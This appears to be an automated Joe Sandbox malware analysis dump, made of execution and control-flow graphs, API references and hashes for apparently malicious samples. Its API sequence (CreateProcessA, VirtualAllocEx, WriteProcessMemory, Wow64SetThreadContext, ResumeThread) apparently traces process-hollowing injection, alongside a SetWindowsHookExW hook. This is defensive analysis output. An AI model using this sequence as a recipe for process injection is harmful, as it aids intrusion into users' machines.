                    execution_graph 22106 a976a8 22107 a976a9 SetWindowsHookExW 22106->22107 22109 a97732 22107->22109 22110 64502a0 22111 64502b5 22110->22111 22115 64550c0 22111->22115 22120 64550d0 22111->22120 22112 6450554 22116 64550f5 22115->22116 22125 6455370 22116->22125 22129 6455362 22116->22129 22117 6455157 22117->22112 22121 64550f5 22120->22121 22123 6455370 3 API calls 22121->22123 22124 6455362 3 API calls 22121->22124 22122 6455157 22122->22112 22123->22122 22124->22122 22126 645537e 22125->22126 22133 645539a 22125->22133 22141 64553a8 22125->22141 22126->22117 22131 64553a8 2 API calls 22129->22131 22132 645539a 2 API calls 22129->22132 22130 645537e 22130->22117 22131->22130 22132->22130 22134 64553a8 22133->22134 22135 64553b5 22134->22135 22149 6454dcc 22134->22149 22135->22126 22138 64553fe 22138->22126 22139 64554c6 GlobalMemoryStatusEx 22140 64554f6 22139->22140 22140->22126 22142 64553b5 22141->22142 22143 64553dd 22141->22143 22142->22126 22144 6454dcc GlobalMemoryStatusEx 22143->22144 22145 64553fa 22144->22145 22146 64553fe 22145->22146 22147 64554c6 GlobalMemoryStatusEx 22145->22147 22146->22126 22148 64554f6 22147->22148 22148->22126 22150 6454dd3 GlobalMemoryStatusEx 22149->22150 22152 64553fa 22150->22152 22152->22138 22152->22139 22153 a9ae50 22154 a9ae96 22153->22154 22158 a9b020 22154->22158 22162 a9b030 22154->22162 22155 a9af83 22159 a9b030 22158->22159 22165 a9ab68 22159->22165 22163 a9ab68 DuplicateHandle 22162->22163 22164 a9b05e 22163->22164 22164->22155 22166 a9b098 DuplicateHandle 22165->22166 22167 a9b05e 22166->22167 22167->22155

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 598 64553a8-64553b3 599 64553b5-64553dc call 6451714 598->599 600 64553dd-64553fc call 6454dcc 598->600 606 6455402-6455461 600->606 607 64553fe-6455401 600->607 614 6455467-64554f4 GlobalMemoryStatusEx 606->614 615 6455463-6455466 606->615 618 64554f6-64554fc 614->618 619 64554fd-6455525 614->619 618->619
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3729569647.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6450000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6cdb802fad1948c0cabd3d71e7df532abcad48349edcd666f0b39becab65402f
                    • Instruction ID: 9cdf4261d79f71e688510adfe934b76d6ef200dc449c1ed7250958ad7e13c91c
                    • Opcode Fuzzy Hash: 6cdb802fad1948c0cabd3d71e7df532abcad48349edcd666f0b39becab65402f
                    • Instruction Fuzzy Hash: 1B412672E043558FCB14DFB9D4007EEBBF1AF89210F15856BD804A7352DB74A885CB90

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 724 a9ab68-a9b12c DuplicateHandle 726 a9b12e-a9b134 724->726 727 a9b135-a9b152 724->727 726->727
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00A9B05E,?,?,?,?,?), ref: 00A9B11F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3721589136.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_a90000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 36e78bc8b10982663fe27439328a930dd07757f73b7315bf5e74a378d1cbcade
                    • Instruction ID: a970be3981d2e6b2f413d17632ec831559b6a6a89aca7067ff9020cca3987429
                    • Opcode Fuzzy Hash: 36e78bc8b10982663fe27439328a930dd07757f73b7315bf5e74a378d1cbcade
                    • Instruction Fuzzy Hash: 6B21E5B59003499FDB10CFAAD584AEEBBF4EB48310F14841AE914A7351D374A954CFA4

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 730 a9b090-a9b092 731 a9b098-a9b12c DuplicateHandle 730->731 732 a9b12e-a9b134 731->732 733 a9b135-a9b152 731->733 732->733
                    APIs
                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00A9B05E,?,?,?,?,?), ref: 00A9B11F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3721589136.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_a90000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: fce675aa13a59cf1e60b752ad8baa8ec7bbb04437729f3e5773a7f63bfb213bc
                    • Instruction ID: 2c3351df82d9413f1f5f9450538afe492139f8e8ec023040ac2037d6d2dfd846
                    • Opcode Fuzzy Hash: fce675aa13a59cf1e60b752ad8baa8ec7bbb04437729f3e5773a7f63bfb213bc
                    • Instruction Fuzzy Hash: 832105B5900248AFDB10CF9AD984ADEFFF8FB48310F14841AE914A3250D374A940CFA0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 736 6454e32-6454e48 737 6454dd3 736->737 738 6454e4a-6454e4b 736->738 739 6455480-64554be 737->739 738->739 740 64554c6-64554f4 GlobalMemoryStatusEx 739->740 741 64554f6-64554fc 740->741 742 64554fd-6455525 740->742 741->742
                    APIs
                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,064553FA), ref: 064554E7
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3729569647.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6450000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: GlobalMemoryStatus
                    • String ID:
                    • API String ID: 1890195054-0
                    • Opcode ID: c94e3cf6d42a497a7ba24fded2a3030bcd879cc0bd49e758804e3047affc1d32
                    • Instruction ID: 349e32e34da92c9dfa492680fc0c35c38961dec912d899e569265933c09341ce
                    • Opcode Fuzzy Hash: c94e3cf6d42a497a7ba24fded2a3030bcd879cc0bd49e758804e3047affc1d32
                    • Instruction Fuzzy Hash: DF2159B1C0425A9FDB14CF9AD4447EEFBF4AF09320F15812AD814A7242D378A955CFE2

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 745 a976a0-a976a2 746 a976a9-a976f2 745->746 747 a976a4-a976a6 745->747 749 a976fe-a97730 SetWindowsHookExW 746->749 750 a976f4 746->750 747->746 751 a97739-a9775e 749->751 752 a97732-a97738 749->752 753 a976fc 750->753 752->751 753->749
                    APIs
                    • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00A97723
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3721589136.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_a90000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HookWindows
                    • String ID:
                    • API String ID: 2559412058-0
                    • Opcode ID: 3b8641ca34c758f1330c4c8edb7b5112b1269df8707b9965954b7afacb7f1729
                    • Instruction ID: 8089133d1c81576cea7fb50107348c35a7f91d1812a3f0f395b6cd0299f631c8
                    • Opcode Fuzzy Hash: 3b8641ca34c758f1330c4c8edb7b5112b1269df8707b9965954b7afacb7f1729
                    • Instruction Fuzzy Hash: DB2137B5D142098FCB14DF9AD844BEEBBF5FF88310F10882AD454A7250CB74A945CFA1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 757 a976a8-a976f2 760 a976fe-a97730 SetWindowsHookExW 757->760 761 a976f4 757->761 762 a97739-a9775e 760->762 763 a97732-a97738 760->763 764 a976fc 761->764 763->762 764->760
                    APIs
                    • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00A97723
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3721589136.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_a90000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HookWindows
                    • String ID:
                    • API String ID: 2559412058-0
                    • Opcode ID: 68d69fc6b3f4ec378f6c1a974c0e7cf5aa1ae8995e4f96ff5ea15938ea457b26
                    • Instruction ID: be93ff7eaf7bd0c16c4eab8b385db17151e1624e61189529bfb1ecb30159b184
                    • Opcode Fuzzy Hash: 68d69fc6b3f4ec378f6c1a974c0e7cf5aa1ae8995e4f96ff5ea15938ea457b26
                    • Instruction Fuzzy Hash: 632115B5D042098FDB14DFAAD844BEEBBF5FF88310F148429D455A7250CB74A944CFA1

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 768 6454dcc-64554f4 GlobalMemoryStatusEx 772 64554f6-64554fc 768->772 773 64554fd-6455525 768->773 772->773
                    APIs
                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,064553FA), ref: 064554E7
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3729569647.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_6450000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: GlobalMemoryStatus
                    • String ID:
                    • API String ID: 1890195054-0
                    • Opcode ID: 4a67f289f4a0190ffce1b4aff1f3571b028d6dcda9ce75086592aca8629b8302
                    • Instruction ID: 693461d5d921622db329bab36027a7737b9449957ca39f8c761c243446fe1dc4
                    • Opcode Fuzzy Hash: 4a67f289f4a0190ffce1b4aff1f3571b028d6dcda9ce75086592aca8629b8302
                    • Instruction Fuzzy Hash: 821133B2C006599BCB24DF9AD444BEEFBF4AF49210F15812AE818A7241D378A950CFE5
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3720616471.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_a2d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e6f780b133a56ba2d27f4b459637426fbb6201e221d49b250065fc801857c7cc
                    • Instruction ID: b8e63bc47e5754fa3820833b0d7baca68c015be9defa68ec1dcd26217fcfea0c
                    • Opcode Fuzzy Hash: e6f780b133a56ba2d27f4b459637426fbb6201e221d49b250065fc801857c7cc
                    • Instruction Fuzzy Hash: 402106B1504240DFDB15DF18E9C0B26BB65FB84318F24C579E9090B257C376D856CAA2
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3720877286.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_a3d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9cd4466a5deaedccab1d6008454852a2153016aa870de84fb3a91e463f5aa070
                    • Instruction ID: 86733c6293f34006af4c19947ed04f6a449ca0ab13df8bd8fcf551e3211481a7
                    • Opcode Fuzzy Hash: 9cd4466a5deaedccab1d6008454852a2153016aa870de84fb3a91e463f5aa070
                    • Instruction Fuzzy Hash: 7521C2B5504244EFDB05DF14E5C0B26BBA5FB84314F24C56DE84A4F256C37ADC4ACA62
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3720877286.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_a3d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0c23ae75ebd36237d66ee1536787ba405f82218bb7187b7ed06dbb7a23f024f3
                    • Instruction ID: d25a0a6f64fd9b399fe79458545a98f33c80fde1c364a0fe1f585e56da0016cb
                    • Opcode Fuzzy Hash: 0c23ae75ebd36237d66ee1536787ba405f82218bb7187b7ed06dbb7a23f024f3
                    • Instruction Fuzzy Hash: 5021D4B5504344EFDB05DF14E9C0B26BBB5FB88314F24C66DE80A4B296C37BD846CA61
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3720877286.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_a3d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 25d540d67aa08a3617e17c52b80ef06764d74c9c618d212a449206c00e287afe
                    • Instruction ID: 51499c9a00df036928dffe077014ad296bcafe7d2f0bdc7e4c665d5403d9e406
                    • Opcode Fuzzy Hash: 25d540d67aa08a3617e17c52b80ef06764d74c9c618d212a449206c00e287afe
                    • Instruction Fuzzy Hash: 08210471604300DFDB18DF20E5C0B26BBA5EB85B14F24C56DE90A4B256C376D847CA62
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3720616471.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_a2d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                    • Instruction ID: b701eea98a7ee8bc6669fdef0eb6c59157f3d4d1fcf05c97588ff37a9ba3091f
                    • Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
                    • Instruction Fuzzy Hash: 66110376404280CFCB12CF04D5C0B16BF72FB94318F24C1A9D8094B657C33AD856CBA1
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3720877286.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_a3d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                    • Instruction ID: cb443226483573549c0576660fc977e742d4b1e38ec72d3f9c2cf344d5777e1b
                    • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                    • Instruction Fuzzy Hash: 50119D75504284DFDB16CF10E9C4B15BBB1FB84314F28C6AAEC494B656C33AD85ACBA1
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3720877286.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_a3d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                    • Instruction ID: 6e7ad50824ce6b9a66c39c67fd483227152dd0729ccc47988867961ecf14d203
                    • Opcode Fuzzy Hash: d3f327db0e2ed1f5e683527615b2bec1ac9a86c970599db5efe8bf84bff6eed3
                    • Instruction Fuzzy Hash: 1D119079504640DFDB16CF10D5C4B15BB71FB44314F28C6A9E8494F656C33AD84ACF52
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3720877286.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_a3d000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e25e9645a5cf3391dfb228d20f9a1865fdab39c41954a6832f54ea582c9d7377
                    • Instruction ID: db26c11cb911e037c6366cf63273b947617a59486e5dcd4a48c46b238ccabcbb
                    • Opcode Fuzzy Hash: e25e9645a5cf3391dfb228d20f9a1865fdab39c41954a6832f54ea582c9d7377
                    • Instruction Fuzzy Hash: 5511BF75504280CFDB16CF20E5C4B15BFB1FB85718F24C6ADE84A4B666C33AD84ACB92

                    Execution Graph

                    Execution Coverage:10.6%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:229
                    Total number of Limit Nodes:10
                    execution_graph 26179 19c4668 26180 19c467a 26179->26180 26181 19c4686 26180->26181 26185 19c4779 26180->26185 26190 19c3e40 26181->26190 26183 19c46a5 26186 19c479d 26185->26186 26194 19c4888 26186->26194 26198 19c4879 26186->26198 26191 19c3e4b 26190->26191 26206 19c5d08 26191->26206 26193 19c70b8 26193->26183 26195 19c48af 26194->26195 26196 19c498c 26195->26196 26202 19c44c4 26195->26202 26199 19c4888 26198->26199 26200 19c44c4 CreateActCtxA 26199->26200 26201 19c498c 26199->26201 26200->26201 26203 19c5918 CreateActCtxA 26202->26203 26205 19c59db 26203->26205 26207 19c5d13 26206->26207 26210 19c5d28 26207->26210 26209 19c715d 26209->26193 26211 19c5d33 26210->26211 26214 19c5d58 26211->26214 26213 19c723a 26213->26209 26215 19c5d63 26214->26215 26218 19c5d88 26215->26218 26217 19c732d 26217->26213 26219 19c5d93 26218->26219 26221 19c888b 26219->26221 26225 19cab30 26219->26225 26220 19c88c9 26220->26217 26221->26220 26229 19ccc20 26221->26229 26234 19ccc30 26221->26234 26239 19caf48 26225->26239 26243 19caf70 26225->26243 26226 19cab46 26226->26221 26230 19ccc51 26229->26230 26231 19ccc75 26230->26231 26266 19cd1e8 26230->26266 26270 19cd1d9 26230->26270 26231->26220 26235 19ccc51 26234->26235 26236 19ccc75 26235->26236 26237 19cd1e8 2 API calls 26235->26237 26238 19cd1d9 2 API calls 26235->26238 26236->26220 26237->26236 26238->26236 26240 19caf4d 26239->26240 26246 19cb068 26240->26246 26241 19caf7f 26241->26226 26245 19cb068 2 API calls 26243->26245 26244 19caf7f 26244->26226 26245->26244 26247 19cb079 26246->26247 26248 19cb09c 26246->26248 26247->26248 26254 19cb300 26247->26254 26258 19cb2f0 26247->26258 26248->26241 26249 19cb094 26249->26248 26250 19cb2a0 GetModuleHandleW 26249->26250 26251 19cb2cd 26250->26251 26251->26241 26255 19cb314 26254->26255 26256 19cb339 26255->26256 26262 19cad88 26255->26262 26256->26249 26259 19cb314 26258->26259 26260 19cad88 LoadLibraryExW 26259->26260 26261 19cb339 26259->26261 26260->26261 26261->26249 26263 19cb4e0 LoadLibraryExW 26262->26263 26265 19cb559 26263->26265 26265->26256 26267 19cd1f5 26266->26267 26268 19cd22f 26267->26268 26274 19cd020 26267->26274 26268->26231 26271 19cd1e8 26270->26271 26272 19cd22f 26271->26272 26273 19cd020 2 API calls 26271->26273 26272->26231 26273->26272 26275 19cd02b 26274->26275 26277 19cdb40 26275->26277 26278 19cd13c 26275->26278 26277->26277 26279 19cd147 26278->26279 26280 19c5d88 2 API calls 26279->26280 26281 19cdbaf 26280->26281 26281->26277 25981 644461e 25986 6445df0 25981->25986 26003 6445de0 25981->26003 26020 6445e4e 25981->26020 25982 644462d 25987 6445e0a 25986->25987 26038 6446507 25987->26038 26043 6446419 25987->26043 26048 64464d8 25987->26048 26053 644683d 25987->26053 26058 64465dc 25987->26058 26062 6446ab3 25987->26062 26070 6446490 25987->26070 26075 6446650 25987->26075 26080 6446277 25987->26080 26085 6446696 25987->26085 26091 6446315 25987->26091 26096 6446c6b 25987->26096 26100 644620e 25987->26100 26105 6446663 25987->26105 25988 6445e2e 25988->25982 26004 6445df0 26003->26004 26006 6446507 2 API calls 26004->26006 26007 6446663 2 API calls 26004->26007 26008 644620e 2 API calls 26004->26008 26009 6446c6b 2 API calls 26004->26009 26010 6446315 2 API calls 26004->26010 26011 6446696 2 API calls 26004->26011 26012 6446277 2 API calls 26004->26012 26013 6446650 2 API calls 26004->26013 26014 6446490 2 API calls 26004->26014 26015 6446ab3 4 API calls 26004->26015 26016 64465dc 2 API calls 26004->26016 26017 644683d 2 API calls 26004->26017 26018 64464d8 2 API calls 26004->26018 26019 6446419 2 API calls 26004->26019 26005 6445e2e 26005->25982 26006->26005 26007->26005 26008->26005 26009->26005 26010->26005 26011->26005 26012->26005 26013->26005 26014->26005 26015->26005 26016->26005 26017->26005 26018->26005 26019->26005 26021 6445ddc 26020->26021 26023 6445e51 26020->26023 26024 6446507 2 API calls 26021->26024 26025 6446663 2 API calls 26021->26025 26026 644620e 2 API calls 26021->26026 26027 6446c6b 2 API calls 26021->26027 26028 6446315 2 API calls 26021->26028 26029 6446696 2 API calls 26021->26029 26030 6446277 2 API calls 26021->26030 26031 6446650 2 API calls 26021->26031 26032 6446490 2 API calls 26021->26032 26033 6446ab3 4 API calls 26021->26033 26034 64465dc 2 API calls 26021->26034 26035 644683d 2 API calls 26021->26035 26036 64464d8 2 API calls 26021->26036 26037 6446419 2 API calls 26021->26037 26022 6445e2e 26022->25982 26024->26022 26025->26022 26026->26022 26027->26022 26028->26022 26029->26022 26030->26022 26031->26022 26032->26022 26033->26022 26034->26022 26035->26022 26036->26022 26037->26022 26039 644650a 26038->26039 26109 6443ab0 26039->26109 26113 6443ab8 26039->26113 26040 6446542 26044 6446321 26043->26044 26044->26043 26117 6443920 26044->26117 26121 6443919 26044->26121 26045 6446768 26045->25988 26049 64464e1 26048->26049 26051 6443ab0 WriteProcessMemory 26049->26051 26052 6443ab8 WriteProcessMemory 26049->26052 26050 6446542 26051->26050 26052->26050 26054 644684a 26053->26054 26125 6443000 26054->26125 26129 6442ff8 26054->26129 26055 6446877 26055->25988 26060 6443ab0 WriteProcessMemory 26058->26060 26061 6443ab8 WriteProcessMemory 26058->26061 26059 6446613 26059->25988 26060->26059 26061->26059 26066 6443ab0 WriteProcessMemory 26062->26066 26067 6443ab8 WriteProcessMemory 26062->26067 26063 6446b00 26064 644674d 26064->26063 26068 6443920 Wow64SetThreadContext 26064->26068 26069 6443919 Wow64SetThreadContext 26064->26069 26065 6446768 26065->25988 26066->26064 26067->26064 26068->26065 26069->26065 26071 6446496 26070->26071 26133 6443ba0 26071->26133 26137 6443ba8 26071->26137 26072 64464b9 26072->25988 26076 644665d 26075->26076 26078 6443000 ResumeThread 26076->26078 26079 6442ff8 ResumeThread 26076->26079 26077 6446877 26077->25988 26078->26077 26079->26077 26081 6446215 26080->26081 26141 6444134 26081->26141 26145 6444140 26081->26145 26086 644674d 26085->26086 26087 6446b00 26086->26087 26089 6443920 Wow64SetThreadContext 26086->26089 26090 6443919 Wow64SetThreadContext 26086->26090 26088 6446768 26088->25988 26089->26088 26090->26088 26092 6446321 26091->26092 26094 6443920 Wow64SetThreadContext 26092->26094 26095 6443919 Wow64SetThreadContext 26092->26095 26093 6446768 26093->25988 26094->26093 26095->26093 26098 6443920 Wow64SetThreadContext 26096->26098 26099 6443919 Wow64SetThreadContext 26096->26099 26097 6446c85 26097->25988 26098->26097 26099->26097 26101 6446214 26100->26101 26103 6444134 CreateProcessA 26101->26103 26104 6444140 CreateProcessA 26101->26104 26102 64462f6 26103->26102 26104->26102 26149 64439f1 26105->26149 26153 64439f8 26105->26153 26106 6446681 26106->25988 26110 6443ab8 WriteProcessMemory 26109->26110 26112 6443b57 26110->26112 26112->26040 26114 6443b00 WriteProcessMemory 26113->26114 26116 6443b57 26114->26116 26116->26040 26118 6443965 Wow64SetThreadContext 26117->26118 26120 64439ad 26118->26120 26120->26045 26122 6443920 Wow64SetThreadContext 26121->26122 26124 64439ad 26122->26124 26124->26045 26126 6443040 ResumeThread 26125->26126 26128 6443071 26126->26128 26128->26055 26130 6443000 ResumeThread 26129->26130 26132 6443071 26130->26132 26132->26055 26134 6443ba8 ReadProcessMemory 26133->26134 26136 6443c37 26134->26136 26136->26072 26138 6443bf3 ReadProcessMemory 26137->26138 26140 6443c37 26138->26140 26140->26072 26142 6444140 CreateProcessA 26141->26142 26144 644438b 26142->26144 26146 64441c9 CreateProcessA 26145->26146 26148 644438b 26146->26148 26150 64439f8 VirtualAllocEx 26149->26150 26152 6443a75 26150->26152 26152->26106 26154 6443a38 VirtualAllocEx 26153->26154 26156 6443a75 26154->26156 26156->26106 26157 19cd300 26158 19cd346 26157->26158 26162 19cd4cf 26158->26162 26166 19cd4e0 26158->26166 26159 19cd433 26163 19cd4e0 26162->26163 26169 19caf54 26163->26169 26167 19caf54 DuplicateHandle 26166->26167 26168 19cd50e 26167->26168 26168->26159 26170 19cd548 DuplicateHandle 26169->26170 26171 19cd50e 26170->26171 26171->26159 26172 6446f28 26173 64470b3 26172->26173 26175 6446f4e 26172->26175 26175->26173 26176 6443de8 26175->26176 26177 64471a8 PostMessageW 26176->26177 26178 6447214 26177->26178 26178->26175

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 6444134-64441d5 3 64441d7-64441e1 0->3 4 644420e-644422e 0->4 3->4 5 64441e3-64441e5 3->5 11 6444267-6444296 4->11 12 6444230-644423a 4->12 6 64441e7-64441f1 5->6 7 6444208-644420b 5->7 9 64441f5-6444204 6->9 10 64441f3 6->10 7->4 9->9 13 6444206 9->13 10->9 18 64442cf-6444389 CreateProcessA 11->18 19 6444298-64442a2 11->19 12->11 14 644423c-644423e 12->14 13->7 16 6444240-644424a 14->16 17 6444261-6444264 14->17 20 644424c 16->20 21 644424e-644425d 16->21 17->11 32 6444392-6444418 18->32 33 644438b-6444391 18->33 19->18 23 64442a4-64442a6 19->23 20->21 21->21 22 644425f 21->22 22->17 24 64442a8-64442b2 23->24 25 64442c9-64442cc 23->25 27 64442b4 24->27 28 64442b6-64442c5 24->28 25->18 27->28 28->28 30 64442c7 28->30 30->25 43 6444428-644442c 32->43 44 644441a-644441e 32->44 33->32 46 644443c-6444440 43->46 47 644442e-6444432 43->47 44->43 45 6444420 44->45 45->43 49 6444450-6444454 46->49 50 6444442-6444446 46->50 47->46 48 6444434 47->48 48->46 51 6444466-644446d 49->51 52 6444456-644445c 49->52 50->49 53 6444448 50->53 54 6444484 51->54 55 644446f-644447e 51->55 52->51 53->49 57 6444485 54->57 55->54 57->57
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06444376
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 3fe29bc9afc4776e5aa28d1dc2f93d7fe976ccd607282873753d4c3d49e21152
                    • Instruction ID: 1399f4ffd4c1408c0acb64a7396829890f4c169409d205adf67147b397b5fc9f
                    • Opcode Fuzzy Hash: 3fe29bc9afc4776e5aa28d1dc2f93d7fe976ccd607282873753d4c3d49e21152
                    • Instruction Fuzzy Hash: 01A16971D006198FEB61DFA8C841BEEBBF2FF48310F15856AD808A7240DB749985CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 58 6444140-64441d5 60 64441d7-64441e1 58->60 61 644420e-644422e 58->61 60->61 62 64441e3-64441e5 60->62 68 6444267-6444296 61->68 69 6444230-644423a 61->69 63 64441e7-64441f1 62->63 64 6444208-644420b 62->64 66 64441f5-6444204 63->66 67 64441f3 63->67 64->61 66->66 70 6444206 66->70 67->66 75 64442cf-6444389 CreateProcessA 68->75 76 6444298-64442a2 68->76 69->68 71 644423c-644423e 69->71 70->64 73 6444240-644424a 71->73 74 6444261-6444264 71->74 77 644424c 73->77 78 644424e-644425d 73->78 74->68 89 6444392-6444418 75->89 90 644438b-6444391 75->90 76->75 80 64442a4-64442a6 76->80 77->78 78->78 79 644425f 78->79 79->74 81 64442a8-64442b2 80->81 82 64442c9-64442cc 80->82 84 64442b4 81->84 85 64442b6-64442c5 81->85 82->75 84->85 85->85 87 64442c7 85->87 87->82 100 6444428-644442c 89->100 101 644441a-644441e 89->101 90->89 103 644443c-6444440 100->103 104 644442e-6444432 100->104 101->100 102 6444420 101->102 102->100 106 6444450-6444454 103->106 107 6444442-6444446 103->107 104->103 105 6444434 104->105 105->103 108 6444466-644446d 106->108 109 6444456-644445c 106->109 107->106 110 6444448 107->110 111 6444484 108->111 112 644446f-644447e 108->112 109->108 110->106 114 6444485 111->114 112->111 114->114
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06444376
                    Memory Dump Source
                    • Source File: 0000000F.00000002.1376552574.0000000006440000.00000040.00000800.00020000.00000000.sdmp, Offset: 06440000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_6440000_pNYyTm.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 4e610610b68d2c3bd8674471f3a042c9a79c56bb2facfc22a73f1f990a704bf9
                    • Instruction ID: 9581a77b159dd1f7a6422486b53211220a8e6d5548e405b7e13b24e4f39c67d7
                    • Opcode Fuzzy Hash: 4e610610b68d2c3bd8674471f3a042c9a79c56bb2facfc22a73f1f990a704bf9
                    • Instruction Fuzzy Hash: CA916A71D006198FEB61DFA8C842BEEBBF2FF48310F15856AD809A7240DB749985CF91

                    Control-flow Graph

                    • Executed
                    • Not Executed
